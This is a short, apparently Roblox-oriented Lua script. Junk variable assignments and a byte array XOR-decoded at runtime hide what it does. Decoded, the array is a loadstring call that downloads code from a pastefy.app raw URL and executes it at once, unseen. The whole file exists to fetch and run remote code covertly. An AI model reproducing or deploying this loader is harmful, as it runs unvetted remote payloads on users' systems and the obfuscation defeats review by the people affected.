local _lOO11 = 46053 * 9
local _1IOIl = 27529 * 1
local _lIlOl = 94670 * 9
local _I1IIl = 81496 * 4
local _1IO1I = 6459 * 2
local __k=79
local __b={35,32,46,43,60,59,61,38,33,40,103,40,46,34,42,117,7,59,59,63,8,42,59,103,109,39,59,59,63,60,117,96,96,63,46,60,59,42,41,54,97,46,63,63,96,35,23,25,61,31,27,54,7,96,61,46,56,109,102,102,103,102}
local function __x(a,b) local r,p=0,1 while a>0 or b>0 do local ab,bb=a%2,b%2 if ab~=bb then r=r+p end a,b,p=(a-ab)/2,(b-bb)/2,p*2 end return r end
local __chars={}
for __i=1,#__b do __chars[__i]=string.char(__x(__b[__i],__k)) end
local __s=table.concat(__chars)
local __ld=loadstring or load
local __f,__err=__ld(__s)
if not __f then error(__err) end
return __f()
